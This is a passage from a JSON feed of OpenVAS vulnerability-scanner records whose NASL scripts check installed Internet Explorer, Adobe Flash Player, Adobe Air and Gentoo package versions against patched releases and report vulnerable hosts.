script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/ms14-012\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3, win8:1, win8_1:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([6-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6512\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21370\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23568\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5294\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21370\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23568\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19040\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.23329\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19506\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23568\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16539\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20650\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18391\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22596\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16539\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20650\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16842\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.20962\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.16000\", test_version2:\"11.0.9600.16520\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16842\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.20962\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8_1:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"11.0.9600.16000\", test_version2:\"11.0.9600.16520\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:38:41", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805903", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_use_after_free_vuln_jul15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805903\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:22:46 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:40:09", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-09T00:00:00", "id": "OPENVAS:1361412562310805912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805912", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805912\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:41:16 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:38:54", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805904", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_use_after_free_vuln_jul15_lin.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805904\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:25:09 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 11.2.202.481 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.481 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"11.2.202.481\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.481\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:47", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-09T00:00:00", "id": "OPENVAS:1361412562310805911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805911", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805911\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:35:12 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:40:25", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201507-13", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121394", "title": "Gentoo Security Advisory GLSA 201507-13", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201507-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121394\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:56 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201507-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201507-13\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3113\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201507-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.481\"), vulnerable: make_list(\"lt 11.2.202.481\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-01T10:27:25", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2015-0273", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130105", "title": "Mageia Linux Local Check: mgasa-2015-0273", "type": "openvas", "sourceData": 